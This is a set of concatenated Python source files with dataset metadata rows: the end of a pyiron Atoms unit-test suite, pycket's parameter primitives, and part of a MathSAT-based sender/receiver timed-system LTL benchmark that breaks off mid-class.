x = basis_Fe.get_spherical_coordinates()
self.assertAlmostEqual(x[1, 2], 0.25*np.pi)
def test_occupy_lattice(self):
basis_Mg = CrystalStructure("Mg", bravais_basis="fcc", lattice_constant=4.2)
basis_O = CrystalStructure("O", bravais_basis="fcc", lattice_constant=4.2)
basis_O.set_scaled_positions(basis_O.get_scaled_positions() + [0.0, 0.0, 0.5])
basis = basis_Mg + basis_O
basis.center_coordinates_in_unit_cell()
orig_basis = basis.copy()
self.assertEqual(basis.get_chemical_formula(), "Mg4O4")
Mg_indices = basis.select_index("Mg")
O_indices = basis.select_index("O")
basis.occupy_lattice(Na=Mg_indices)
self.assertEqual(basis.get_chemical_formula(), "Na4O4")
basis.occupy_lattice(Cl=O_indices)
self.assertEqual(basis.get_chemical_formula(), "Cl4Na4")
self.assertTrue(np.array_equal(basis.select_index("Na"), Mg_indices))
self.assertTrue(np.array_equal(basis.select_index("Cl"), O_indices))
orig_basis.set_repeat([2, 2, 2])
Mg_indices = orig_basis.select_index("Mg")
O_indices = orig_basis.select_index("O")
orig_basis.occupy_lattice(Cl=O_indices, Na=Mg_indices)
self.assertEqual(orig_basis.get_chemical_formula(), "Cl32Na32")
orig_basis.occupy_lattice(H=O_indices[0])
self.assertEqual(orig_basis.get_chemical_formula(), "Cl31HNa32")
def test_get_majority_species(self):
basis = Atoms(
symbols=4 * ["Fe"], positions=np.random.random((4, 3)), cell=np.eye(3)
)
self.assertEqual(basis.get_majority_species()["count"], 4)
self.assertEqual(basis.get_majority_species()["symbol"], "Fe")
basis = Atoms(
symbols=["Fe", "Cu", "Ni", "Al"],
positions=np.random.random((4, 3)),
cell=np.eye(3),
)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
basis.get_majority_species()
self.assertEqual(len(w), 1)
def test_select_index(self):
basis = Atoms(
symbols=["Fe", "Cu", "Ni", "Al"],
positions=np.random.random((4, 3)),
cell=np.eye(3),
)
self.assertTrue(np.array_equal(basis.select_index("Fe"), [0]))
self.assertTrue(np.array_equal(basis.select_index("Ni"), [2]))
self.assertTrue(np.array_equal(basis.select_index(["Cu", "Al"]), [1, 3]))
Fe = basis.convert_element("Fe")
Ni = basis.convert_element("Ni")
self.assertTrue(np.array_equal(basis.select_index([Fe, Ni]), [0, 2]))
pse = PeriodicTable()
pse.add_element("Ni", "Ni_up", spin=1)
ni_up = pse.element("Ni_up")
basis = Atoms(
symbols=["Fe", "Cu", ni_up, "Al"],
positions=np.random.random((4, 3)),
cell=np.eye(3),
)
self.assertTrue(np.array_equal(basis.select_index("Fe"), [0]))
self.assertTrue(np.array_equal(basis.select_index(ni_up), [2]))
self.assertTrue(np.array_equal(basis.select_index(["Cu", "Al"]), [1, 3]))
Fe = basis.convert_element("Fe")
Ni = basis.convert_element(ni_up)
self.assertTrue(np.array_equal(basis.select_index([Fe, Ni]), [0, 2]))
def test_parent_index(self):
basis_Mg = CrystalStructure("Mg", bravais_basis="fcc", lattice_constant=4.2)
basis_O = CrystalStructure("O", bravais_basis="fcc", lattice_constant=4.2)
basis_O.positions += [0.0, 0.0, 0.5]
basis = basis_Mg + basis_O
basis.center_coordinates_in_unit_cell()
basis.set_repeat([2, 2, 2])
o_indices = basis.select_index("O")
pse = PeriodicTable()
pse.add_element("O", "O_up", spin="up")
o_up = pse.element("O_up")
basis[o_indices] = o_up
self.assertTrue(np.array_equal(o_indices, basis.select_index(o_up)))
self.assertEqual(len(basis.select_index("O")), 0)
self.assertTrue(np.array_equal(o_indices, basis.select_parent_index("O")))
def test__eq__(self):
test_basis = self.CO2.copy()
self.assertEqual(test_basis, self.CO2)
test_basis.positions[2] += 0.0
self.assertEqual(test_basis, self.CO2)
self.assertNotEqual(self.C2, self.CO2)
def test__add__(self):
cell = np.eye(3) * 10.0
basis_0 = Atoms(["O"], scaled_positions=[[0.5, 0.5, 0.5]], cell=cell)
basis_1 = Atoms(["H"], scaled_positions=[[0.75, 0.75, 0.75]], cell=cell)
basis_2 = Atoms(["H"], scaled_positions=[[0.25, 0.25, 0.25]], cell=cell)
basis_3 = Atoms(
["H", "O", "N"],
scaled_positions=[[0.35, 0.35, 0.35], [0.0, 0.0, 0.0], [0.0, 0.0, 0.1]],
cell=cell,
)
pse = PeriodicTable()
pse.add_element("O", "O_up", spin="up")
o_up = pse.element("O_up")
basis_4 = Atoms(
[o_up], scaled_positions=[[0.27, 0.27, 0.27]], cell=np.eye(3) * 20.0
)
b = basis_0 + basis_1
self.assertEqual(b.get_chemical_formula(), "HO")
b = basis_0 + basis_1 + basis_2
self.assertEqual(b.get_chemical_formula(), "H2O")
b += basis_2
self.assertEqual(b.get_chemical_formula(), "H3O")
b = basis_0 + basis_1 + basis_2 + basis_3
self.assertEqual(b.get_chemical_formula(), "H3NO2")
self.assertTrue(
np.array_equal(
b.get_scaled_positions()[b.select_index("N")], [[0.0, 0.0, 0.1]]
)
)
self.assertTrue(
np.allclose(
b.get_scaled_positions()[b.select_index("H")],
[[0.75, 0.75, 0.75], [0.25, 0.25, 0.25], [0.35, 0.35, 0.35]],
)
)
self.assertTrue(
np.allclose(
b.get_scaled_positions()[b.select_index("O")],
[[0.5, 0.5, 0.5], [0.0, 0.0, 0.0]],
)
)
b.set_repeat([2, 2, 2])
self.assertEqual(b.get_chemical_formula(), "H24N8O16")
b += basis_4
self.assertEqual(b.get_chemical_formula(), "H24N8O16O_up")
self.assertTrue(
np.allclose(
b.get_scaled_positions()[b.select_index(o_up)], [[0.27, 0.27, 0.27]]
)
)
COX = self.C2 + Atom("O", position=[0, 0, -2])
COX += Atom("O", position=[0, 0, -4])
COX += COX
n_objects = len(set(COX.get_species_objects()))
n_species = len(set(COX.get_chemical_elements()))
self.assertEqual(n_objects, n_species)
self.assertEqual(n_objects, 2)
self.assertEqual(n_species, 2)
basis_Mg = CrystalStructure("Mg", bravais_basis="fcc", lattice_constant=4.2)
basis_O = CrystalStructure("O", bravais_basis="fcc", lattice_constant=4.2)
# basis_O.set_relative()
basis_O.set_scaled_positions([0.0, 0.0, 0.5] + basis_O.get_scaled_positions())
basis = basis_Mg + basis_O
self.assertEqual(
len(basis._tag_list), len(basis_Mg._tag_list) + len(basis_O._tag_list)
)
basis.center_coordinates_in_unit_cell()
self.assertEqual(basis.get_spacegroup()["Number"], 225)
# Adding an ASE instance to a pyiron instance
ase_basis = ASEAtoms("O", scaled_positions=[[0, 0, 0]], cell=np.eye(3) * 10)
pyiron_basis = Atoms("O", scaled_positions=[[0.5, 0.5, 0.5]], cell=np.eye(3) * 10)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
pyiron_basis += ase_basis
self.assertEqual(len(pyiron_basis), 2)
self.assertEqual(len(ase_basis), 1)
self.assertIsInstance(pyiron_basis, Atoms)
ase_basis += pyiron_basis
self.assertEqual(len(ase_basis), 3)
self.assertIsInstance(ase_basis, ASEAtoms)
self.assertNotIsInstance(ase_basis, Atoms)
self.assertEqual(len(w), 1)
pyiron_basis += ase_basis[0]
self.assertEqual(len(pyiron_basis), 3)
pyiron_basis = Atoms("O", scaled_positions=[[0.5, 0.5, 0.5]], cell=np.eye(3) * 10, pbc=True)
larger_cell = pyiron_basis.repeat(2)
larger_cell.positions += 2.5
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
larger_cell += pyiron_basis
self.assertEqual(len(w), 1)
basis_1 = Atoms("O", scaled_positions=[[0.5, 0.5, 0.5]], cell=np.eye(3) * 10)
basis_2 = Atoms("O", scaled_positions=[[0., 0.5, 0.5]], cell=np.eye(3) * 10, pbc=True)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
basis_1 += basis_2
self.assertEqual(len(w), 1)
a_0 = 2.86
structure = self.struct_factory.crystal('Fe', 'bcc', a_0)
carbon = Atoms(symbols=['C'], positions=[[0, 0, 0.5 * a_0]])
structure += carbon
self.assertEqual(carbon.indices[0], 0)
def test_append(self):
a_0 = 2.86
structure = self.struct_factory.crystal('Fe', 'bcc', a_0)
carbon = Atoms(symbols=['C'], positions=[[0, 0, 0.5 * a_0]], pbc=True)
with warnings.catch_warnings(record=True) as w:
structure.append(carbon)
self.assertEqual(len(w), 0)
structure = self.struct_factory.crystal('Fe', 'bcc', a_0)
carbon.cell = np.random.rand(3)
structure.append(carbon)
self.assertEqual(len(w), 1)
def test__delitem__(self):
cell = np.eye(3) * 10.0
basis_0 = Atoms(["O"], scaled_positions=[[0.5, 0.5, 0.5]], cell=cell)
basis_1 = Atoms(["H"], scaled_positions=[[0.75, 0.75, 0.75]], cell=cell)
basis_2 = Atoms(["H"], scaled_positions=[[0.25, 0.25, 0.25]], cell=cell)
basis_3 = Atoms(
["H", "O", "N"],
scaled_positions=[[0.35, 0.35, 0.35], [0.0, 0.0, 0.0], [0.0, 0.0, 0.1]],
cell=cell,
)
pse = PeriodicTable()
pse.add_element("O", "O_up", spin="up")
o_up = pse.element("O_up")
basis_4 = Atoms([o_up], scaled_positions=[[0.27, 0.27, 0.27]], cell=cell)
b = basis_0 + basis_1 + basis_2 + basis_3 + basis_4
O_indices = b.select_index("O")
self.assertEqual(len(b), 7)
self.assertEqual(len(b.indices), 7)
self.assertEqual(len(b.species), 4)
b.__delitem__(O_indices[0])
self.assertEqual(b.get_chemical_formula(), "H3NOO_up")
self.assertEqual(len(b), 6)
self.assertEqual(len(b.indices), 6)
self.assertEqual(len(b._tag_list), 6)
self.assertEqual(len(b.species), 4)
O_indices = b.select_index("O")
b.__delitem__(O_indices)
self.assertEqual(b.get_chemical_formula(), "H3NO_up")
self.assertEqual(len(b), 5)
self.assertEqual(len(b.indices), 5)
self.assertEqual(len(b.species), 3)
self.assertEqual(np.max(b.indices), 2)
N_indices = b.select_index("N")
b.__delitem__(N_indices)
self.assertEqual(b.get_chemical_formula(), "H3O_up")
self.assertEqual(len(b), 4)
self.assertEqual(len(b.indices), 4)
self.assertEqual(len(b.species), 2)
self.assertEqual(np.max(b.indices), 1)
O_indices = b.select_index(o_up)
b.__delitem__(O_indices)
self.assertEqual(b.get_chemical_formula(), "H3")
self.assertEqual(len(b), 3)
self.assertEqual(len(b.indices), 3)
self.assertEqual(len(b.species), 1)
self.assertEqual(np.max(b.indices), 0)
def test__setitem__(self):
basis = self.CO2.copy()
basis[0] = "H"
basis[1] = "H"
self.assertEqual(basis.get_chemical_formula(), "H2O")
self.assertEqual(len(basis.species), 2)
self.assertEqual(len(basis.get_species_symbols()), 2)
basis = self.CO2.copy()
basis[0] = "H"
basis[np.int64(0)] = "H"
self.assertEqual(basis.get_chemical_formula(), "HO2")
self.assertEqual(len(basis.species), 2)
self.assertEqual(len(basis.get_species_symbols()), 2)
basis[0] = "O"
self.assertEqual(basis.get_chemical_formula(), "O3")
self.assertEqual(len(basis.species), 1)
self.assertEqual(len(basis.get_species_symbols()), 1)
basis = self.CO2.copy()
basis[[2]] = "N"
self.assertEqual(basis.get_chemical_formula(), "CNO")
self.assertEqual(len(basis.species), 3)
self.assertEqual(len(basis.get_species_symbols()), 3)
basis = self.CO2.copy()
basis[[0]] = "H"
basis[np.array([0])] = "H"
self.assertEqual(basis.get_chemical_formula(), "HO2")
self.assertEqual(len(basis.species), 2)
self.assertEqual(len(basis.get_species_symbols()), 2)
basis = self.CO2.copy()
basis[[0]] = "N"
self.assertEqual(basis.get_chemical_formula(), "NO2")
self.assertEqual(len(basis.species), 2)
self.assertEqual(len(basis.get_species_symbols()), 2)
basis[[0]] = "O"
self.assertEqual(basis.get_chemical_formula(), "O3")
self.assertEqual(len(basis.species), 1)
self.assertEqual(len(basis.get_species_symbols()), 1)
basis[[0, 2]] = "H"
self.assertEqual(basis.get_chemical_formula(), "H2O")
self.assertEqual(len(basis.species), 2)
self.assertEqual(len(basis.get_species_symbols()), 2)
pse = PeriodicTable()
pse.add_element("O", "O_up", spin="up")
o_up = pse.element("O_up")
basis[[0, 2]] = o_up
self.assertEqual(basis.get_chemical_formula(), "OO_up2")
self.assertEqual(len(basis.species), 2)
self.assertEqual(len(basis.get_species_symbols()), 2)
basis[0:3] = "N"
self.assertEqual(basis.get_chemical_formula(), "N3")
self.assertEqual(len(basis.species), 1)
self.assertEqual(len(basis.get_species_symbols()), 1)
basis[:] = "Ne"
self.assertEqual(basis.get_chemical_formula(), "Ne3")
self.assertEqual(len(basis.species), 1)
self.assertEqual(len(basis.get_species_symbols()), 1)
basis[-2:] = "H"
self.assertEqual(basis.get_chemical_formula(), "H2Ne")
self.assertEqual(len(basis.species), 2)
self.assertEqual(len(basis.get_species_symbols()), 2)
basis[0:3] = "O"
self.assertEqual(basis.get_chemical_formula(), "O3")
self.assertEqual(len(basis.species), 1)
self.assertEqual(len(basis.get_species_symbols()), 1)
lat_0 = CrystalStructure(
"Al", bravais_basis="fcc", lattice_constant=4.0
).repeat(3)
# lat_0.set_SQS(['Al', 'Mg'], x=1/4) # simple access to SQS
lat_0[:] = "V"
self.assertEqual(lat_0.get_chemical_formula(), "V108")
lat_0[[1, 3, 5]] = "Mg" # direct occupation
self.assertEqual(lat_0.get_chemical_formula(), "Mg3V105")
# lat_0[[0]] = 'V' # vacancy (note: do not delete atom)
lat_1 = lat_0.copy()
lat_1.set_scaled_positions(1 / 4 + lat_1.get_scaled_positions())
lat_1[:] = "V"
self.assertEqual(lat_1.get_chemical_formula(), "V108")
lat_1[[1, 4, 9]] = "H"
lat_1[[2, 5, 8]] = "C"
self.assertEqual(lat_1.get_chemical_formula(), "C3H3V102")
lat_1.set_scaled_positions(1 / 4 + lat_1.get_scaled_positions())
lat_1[:] = "V" # vacancies
self.assertEqual(lat_1.get_chemical_formula(), "V108")
basis_Mg = CrystalStructure("Mg", bravais_basis="fcc", lattice_constant=4.2)
basis_Mg.set_repeat(3)
basis_Mg[:-3] = "Al"
self.assertEqual(basis_Mg.get_chemical_formula(), 'Al105Mg3')
basis_Mg[4:-len(basis_Mg)+7] = "C"
self.assertEqual(basis_Mg.get_chemical_formula(), 'Al102C3Mg3')
basis_Mg[4:] = "C"
self.assertEqual(basis_Mg.get_chemical_formula(), 'Al4C104')
basis_Mg[:] = "Mg"
self.assertEqual(basis_Mg.get_chemical_formula(), 'Mg108')
basis_Mg[::2] = "Al"
self.assertEqual(basis_Mg.get_chemical_formula(), 'Al54Mg54')
struct = CrystalStructure("Al", bravais_basis="fcc", lattice_constant=4.2, bravais_lattice="cubic")
struct[0] = 'Mg'
self.assertEqual(struct.get_chemical_formula(), 'Al3Mg')
struct[1] = 'Cu'
self.assertEqual(struct.get_chemical_formula(), 'Al2CuMg')
struct[0] = 'Cu'
struct[1] = 'Cu'
struct[2] = 'Cu'
struct[3] = 'Cu'
self.assertEqual(struct.get_chemical_formula(), 'Cu4')
struct = CrystalStructure("Al", bravais_basis="fcc", lattice_constant=4.2, bravais_lattice="cubic")
struct[0] = 'Mg'
self.assertEqual(struct.get_chemical_formula(), 'Al3Mg')
struct[1] = 'Cu'
self.assertEqual(struct.get_chemical_formula(), 'Al2CuMg')
struct[0:] = 'N'
self.assertEqual(struct.get_chemical_formula(), 'N4')
struct = CrystalStructure("Al", bravais_basis="fcc", lattice_constant=4.2, bravais_lattice="cubic")
struct[0] = 'Mg'
self.assertEqual(struct.get_chemical_formula(), 'Al3Mg')
struct[1] = 'Cu'
self.assertEqual(struct.get_chemical_formula(), 'Al2CuMg')
struct[0:] = 'Cu'
self.assertEqual(struct.get_chemical_formula(), 'Cu4')
struct = CrystalStructure("Al", bravais_basis="fcc", lattice_constant=4.2, bravais_lattice="cubic")
struct[0] = 'Mg'
self.assertEqual(struct.get_chemical_formula(), 'Al3Mg')
struct[1] = 'Cu'
self.assertEqual(struct.get_chemical_formula(), 'Al2CuMg')
struct[0:] = 'Mg'
self.assertEqual(struct.get_chemical_formula(), 'Mg4')
def test_static_functions(self):
Al_bulk = self.struct_factory.ase_bulk("Al")
self.assertIsInstance(Al_bulk, Atoms)
self.assertTrue(all(Al_bulk.pbc))
surface = self.struct_factory.surface("Al", "fcc111", size=(4, 4, 4), vacuum=10)
self.assertTrue(all(surface.pbc))
surface = self.struct_factory.surface("Al", "fcc111", size=(4, 4, 4), vacuum=10, pbc=[True, True, False])
self.assertTrue(all(surface.pbc[0:2]))
self.assertFalse(surface.pbc[2])
self.assertIsInstance(surface, Atoms)
hkl_surface = self.struct_factory.surface_hkl(Al_bulk, [10, 8, 7], layers=20, vacuum=10)
self.assertIsInstance(hkl_surface, Atoms)
self.assertTrue(all(hkl_surface.pbc))
hkl_surface_center = self.struct_factory.surface_hkl(
Al_bulk, [10, 8, 7], layers=20, vacuum=10, center=True
)
mean_z = np.mean([p[2] for p in hkl_surface_center.positions])
self.assertAlmostEqual(mean_z, hkl_surface_center.cell[2][2]/2)
def test_non_periodic(self):
structure = CrystalStructure("Fe", bravais_basis="bcc", lattice_constant=4.2)
pos = structure.repeat([1, 1, 2]).positions.copy()
structure = CrystalStructure("Fe", bravais_basis="bcc", lattice_constant=4.2)
structure.pbc = [False, False, True]
pos_new = structure.repeat([1, 1, 2]).positions.copy()
self.assertTrue(np.allclose(pos, pos_new))
c3 = Atoms("C3", positions=[[0, 0, 0], [0, 0, 2], [0, 2, 0]])
c3.get_scaled_positions()
c3 = Atoms("C3", positions=[[0, 0, 0], [0, 0, 2], [0, 2, 0]], cell=np.eye(3)*10)
c3.get_scaled_positions()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
c3.get_scaled_positions()
self.assertEqual(len(w), 0)
def test_get_wrapped_coordinates(self):
structure = CrystalStructure("Fe", bravais_basis="bcc", lattice_constant=4.2, pbc=True)
position = structure.get_wrapped_coordinates(structure.cell*1.1)
self.assertAlmostEqual(
np.linalg.norm(position-structure.cell*0.1), 0
)
def generate_fcc_lattice(a=4.2):
positions = [[0, 0, 0]]
cell = (np.ones((3, 3)) - np.eye(3)) * 0.5 * a
return positions, cell
if __name__ == "__main__":
unittest.main()
| 45.289855 | 119 | 0.602822 |
45ffb9629bab3fe646b41127ac7dd133c3abc177 | 2,101 | py | Python | pycket/prims/parameter.py | krono/pycket | 5eff3401ce5cf34b16863b669ac9e274edabbe00 | [
"MIT"
] | null | null | null | pycket/prims/parameter.py | krono/pycket | 5eff3401ce5cf34b16863b669ac9e274edabbe00 | [
"MIT"
] | null | null | null | pycket/prims/parameter.py | krono/pycket | 5eff3401ce5cf34b16863b669ac9e274edabbe00 | [
"MIT"
] | null | null | null |
from pycket import values
from pycket import values_parameter
from pycket.base import W_Object
from pycket.error import SchemeException
from pycket.prims.expose import expose, expose_val, default, procedure
@expose("make-parameter",
[values.W_Object, default(values.W_Object, values.w_false)])
def make_parameter(init, guard):
return values_parameter.W_Parameter(init, guard)
@expose("make-derived-parameter",
[values_parameter.W_BaseParameter, procedure, procedure])
def make_derived_parameter(param, guard, wrap):
return values_parameter.W_DerivedParameter(param, guard, wrap)
@expose("extend-parameterization",
[values.W_Object, values.W_Object, values.W_Object])
def extend_paramz(paramz, key, val):
if not isinstance(key, values_parameter.W_BaseParameter):
raise SchemeException("Not a parameter: " + key.tostring())
if isinstance(paramz, values_parameter.W_Parameterization):
return paramz.extend([key], [val])
else:
return paramz # This really is the Racket behavior
def call_with_parameterization(f, args, paramz, env, cont):
cont.update_cm(values.parameterization_key, paramz)
return f.call(args, env, cont)
@expose("call-with-parameterization",
[values.W_Object, values_parameter.W_Parameterization], simple=False)
def call_w_paramz(f, paramz, env, cont):
return call_with_parameterization(f, [], paramz, env, cont)
def call_with_extended_paramz(f, args, keys, vals, env, cont):
from pycket.values import parameterization_key
# XXX seems untested?
paramz = cont.get_mark_first(parameterization_key)
assert isinstance(paramz, values_parameter.W_Parameterization) # XXX is this always right?
paramz_new = paramz.extend(keys, vals)
return call_with_parameterization(f, args, paramz_new, env, cont)
expose_val("parameterization-key", values.parameterization_key)
expose_val("print-mpair-curly-braces", values_parameter.W_Parameter(values.w_false))
expose_val("print-pair-curly-braces", values_parameter.W_Parameter(values.w_false))
| 42.02 | 94 | 0.750595 |
10b57a42f6656b3d0d27d772027c6b280a0ede19 | 18,603 | py | Python | benchmarks/f3_wrong_hints/scaling_ltl_timed_transition_system/15-sender_receiver_39.py | EnricoMagnago/F3 | c863215c318d7d5f258eb9be38c6962cf6863b52 | [
"MIT"
] | 3 | 2021-04-23T23:29:26.000Z | 2022-03-23T10:00:30.000Z | benchmarks/f3_wrong_hints/scaling_ltl_timed_transition_system/15-sender_receiver_39.py | EnricoMagnago/F3 | c863215c318d7d5f258eb9be38c6962cf6863b52 | [
"MIT"
] | null | null | null | benchmarks/f3_wrong_hints/scaling_ltl_timed_transition_system/15-sender_receiver_39.py | EnricoMagnago/F3 | c863215c318d7d5f258eb9be38c6962cf6863b52 | [
"MIT"
] | 1 | 2021-11-17T22:02:56.000Z | 2021-11-17T22:02:56.000Z | from typing import FrozenSet
from collections import Iterable
from math import log, ceil
from mathsat import msat_term, msat_env
from mathsat import msat_make_constant, msat_declare_function
from mathsat import msat_get_integer_type, msat_get_rational_type, msat_get_bool_type
from mathsat import msat_make_and, msat_make_not, msat_make_or, msat_make_iff
from mathsat import msat_make_leq, msat_make_equal, msat_make_true
from mathsat import msat_make_number, msat_make_plus, msat_make_times
from pysmt.environment import Environment as PysmtEnv
import pysmt.typing as types
from ltl.ltl import TermMap, LTLEncoder
from utils import name_next, symb_to_next
from hint import Hint, Location
delta_name = "delta"
def decl_consts(menv: msat_env, name: str, c_type) -> tuple:
assert not name.startswith("_"), name
s = msat_declare_function(menv, name, c_type)
s = msat_make_constant(menv, s)
x_s = msat_declare_function(menv, name_next(name), c_type)
x_s = msat_make_constant(menv, x_s)
return s, x_s
def make_enum(menv, v_name: str, enum_size: int):
bool_type = msat_get_bool_type(menv)
num_bits = ceil(log(enum_size, 2))
b_vars = []
for idx in range(num_bits):
c_name = "{}{}".format(v_name, idx)
b_vars.append(tuple(decl_consts(menv, c_name, bool_type)))
vals = []
x_vals = []
for enum_val in range(enum_size):
bit_val = format(enum_val, '0{}b'.format(num_bits))
assert len(bit_val) == num_bits
assert all(c in {'0', '1'} for c in bit_val)
assign = [b_vars[idx] if c == '1' else
(msat_make_not(menv, b_vars[idx][0]),
msat_make_not(menv, b_vars[idx][1]))
for idx, c in enumerate(reversed(bit_val))]
pred = assign[0][0]
x_pred = assign[0][1]
for it in assign[1:]:
pred = msat_make_and(menv, pred, it[0])
x_pred = msat_make_and(menv, x_pred, it[1])
vals.append(pred)
x_vals.append(x_pred)
assert len(vals) == enum_size
assert len(x_vals) == enum_size
return b_vars, vals, x_vals
def msat_make_minus(menv: msat_env, arg0: msat_term, arg1: msat_term):
m_one = msat_make_number(menv, "-1")
arg1 = msat_make_times(menv, arg1, m_one)
return msat_make_plus(menv, arg0, arg1)
def msat_make_lt(menv: msat_env, arg0: msat_term, arg1: msat_term):
geq = msat_make_geq(menv, arg0, arg1)
return msat_make_not(menv, geq)
def msat_make_geq(menv: msat_env, arg0: msat_term, arg1: msat_term):
return msat_make_leq(menv, arg1, arg0)
def msat_make_gt(menv: msat_env, arg0: msat_term, arg1: msat_term):
leq = msat_make_leq(menv, arg0, arg1)
return msat_make_not(menv, leq)
def msat_make_impl(menv: msat_env, arg0: msat_term, arg1: msat_term):
n_arg0 = msat_make_not(menv, arg0)
return msat_make_or(menv, n_arg0, arg1)
def diverging_symbs(menv: msat_env) -> frozenset:
real_type = msat_get_rational_type(menv)
delta = msat_declare_function(menv, delta_name, real_type)
delta = msat_make_constant(menv, delta)
return frozenset([delta])
def check_ltl(menv: msat_env, enc: LTLEncoder) -> (Iterable, msat_term,
msat_term, msat_term):
assert menv
assert isinstance(menv, msat_env)
assert enc
assert isinstance(enc, LTLEncoder)
int_type = msat_get_integer_type(menv)
real_type = msat_get_rational_type(menv)
r2s, x_r2s = decl_consts(menv, "r2s", int_type)
s2r, x_s2r = decl_consts(menv, "s2r", int_type)
delta, x_delta = decl_consts(menv, delta_name, real_type)
sender = Sender("s", menv, enc, r2s, x_r2s, s2r, x_s2r, delta)
receiver = Receiver("r", menv, enc, s2r, x_s2r, r2s, x_r2s, delta)
curr2next = {r2s: x_r2s, s2r: x_s2r, delta: x_delta}
for comp in [sender, receiver]:
for s, x_s in comp.symb2next.items():
curr2next[s] = x_s
zero = msat_make_number(menv, "0")
init = msat_make_and(menv, receiver.init, sender.init)
trans = msat_make_and(menv, receiver.trans, sender.trans)
# invar delta >= 0
init = msat_make_and(menv, init,
msat_make_geq(menv, delta, zero))
trans = msat_make_and(menv, trans,
msat_make_geq(menv, x_delta, zero))
# delta > 0 -> (r2s' = r2s & s2r' = s2r)
lhs = msat_make_gt(menv, delta, zero)
rhs = msat_make_and(menv,
msat_make_equal(menv, x_r2s, r2s),
msat_make_equal(menv, x_s2r, s2r))
trans = msat_make_and(menv, trans,
msat_make_impl(menv, lhs, rhs))
# (G F !s.stutter) -> G (s.wait_ack -> F s.send)
lhs = enc.make_G(enc.make_F(msat_make_not(menv, sender.stutter)))
rhs = enc.make_G(msat_make_impl(menv, sender.wait_ack,
enc.make_F(sender.send)))
ltl = msat_make_impl(menv, lhs, rhs)
return TermMap(curr2next), init, trans, ltl
class Module:
def __init__(self, name: str, menv: msat_env, enc: LTLEncoder,
*args, **kwargs):
self.name = name
self.menv = menv
self.enc = enc
self.symb2next = {}
true = msat_make_true(menv)
self.init = true
self.trans = true
def _symb(self, v_name, v_type):
v_name = "{}_{}".format(self.name, v_name)
return decl_consts(self.menv, v_name, v_type)
def _enum(self, v_name: str, enum_size: int):
c_name = "{}_{}".format(self.name, v_name)
return make_enum(self.menv, c_name, enum_size)
class Sender(Module):
def __init__(self, name: str, menv: msat_env, enc: LTLEncoder,
in_c, x_in_c, out_c, x_out_c, delta):
super().__init__(name, menv, enc)
bool_type = msat_get_bool_type(menv)
int_type = msat_get_integer_type(menv)
real_type = msat_get_rational_type(menv)
loc, x_loc = self._symb("l", bool_type)
evt, x_evt = self._symb("evt", bool_type)
msg_id, x_msg_id = self._symb("msg_id", int_type)
timeout, x_timeout = self._symb("timeout", real_type)
c, x_c = self._symb("c", real_type)
self.move = evt
self.stutter = msat_make_not(menv, evt)
self.x_move = x_evt
self.x_stutter = msat_make_not(menv, x_evt)
self.send = loc
self.wait_ack = msat_make_not(menv, loc)
self.x_send = x_loc
self.x_wait_ack = msat_make_not(menv, x_loc)
self.symb2next = {loc: x_loc, evt: x_evt, msg_id: x_msg_id,
timeout: x_timeout, c: x_c}
zero = msat_make_number(menv, "0")
one = msat_make_number(menv, "1")
base_timeout = one
# send & c = 0 & msg_id = 0
self.init = msat_make_and(menv,
msat_make_and(menv, self.send,
msat_make_equal(menv, c,
zero)),
msat_make_equal(menv, msg_id, zero))
# invar: wait_ack -> c <= timeout
self.init = msat_make_and(
menv, self.init,
msat_make_impl(menv, self.wait_ack,
msat_make_leq(menv, c, timeout)))
self.trans = msat_make_impl(menv, self.x_wait_ack,
msat_make_leq(menv, x_c, x_timeout))
# delta > 0 | stutter -> l' = l & msg_id' = msg_id & timeout' = timeout &
# c' = c + delta & out_c' = out_c
lhs = msat_make_or(menv, msat_make_gt(menv, delta, zero), self.stutter)
rhs = msat_make_and(
menv,
msat_make_and(menv,
msat_make_iff(menv, x_loc, loc),
msat_make_equal(menv, x_msg_id, msg_id)),
msat_make_and(menv,
msat_make_equal(menv, x_timeout, timeout),
msat_make_equal(menv, x_c,
msat_make_plus(menv, c, delta))))
rhs = msat_make_and(menv, rhs,
msat_make_equal(menv, x_out_c, out_c))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
disc_t = msat_make_and(menv, self.move,
msat_make_equal(menv, delta, zero))
# (send & send') ->
# (msg_id' = msg_id & timeout' = base_timeout & c' = 0 & out_c' = out_c)
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.send, self.x_send))
rhs = msat_make_and(
menv,
msat_make_and(menv,
msat_make_equal(menv, x_msg_id, msg_id),
msat_make_equal(menv, x_timeout, base_timeout)),
msat_make_and(menv,
msat_make_equal(menv, x_c, zero),
msat_make_equal(menv, x_out_c, out_c)))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (send & wait_ack') ->
# (msg_id' = msg_id + 1 & timeout' = base_timeout & c' = 0 & out_c' = out_c)
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.send, self.x_wait_ack))
rhs = msat_make_and(
menv,
msat_make_and(menv,
msat_make_equal(menv, x_msg_id,
msat_make_plus(menv, msg_id, one)),
msat_make_equal(menv, x_timeout, base_timeout)),
msat_make_and(menv,
msat_make_equal(menv, x_c, zero),
msat_make_equal(menv, x_out_c, out_c)))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (wait_ack) -> (c' = 0 & out_c' = out_c &
# (wait_ack' <-> (in_c != msg_id & c > timeout))
lhs = msat_make_and(menv, disc_t, self.wait_ack)
rhs_iff = msat_make_and(menv,
msat_make_not(menv,
msat_make_equal(menv, in_c,
msg_id)),
msat_make_geq(menv, c, timeout))
rhs_iff = msat_make_iff(menv, self.x_wait_ack, rhs_iff)
rhs = msat_make_and(menv,
msat_make_and(menv,
msat_make_equal(menv, x_c, zero),
msat_make_equal(menv, x_out_c,
out_c)),
rhs_iff)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (wait_ack & wait_ack') -> (timeout' > timeout)
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.wait_ack,
self.x_wait_ack))
rhs = msat_make_gt(menv, x_timeout, timeout)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (wait_ack) -> (send' <-> (in_c = msg_id & c < timeout))
lhs = msat_make_and(menv, disc_t, self.wait_ack)
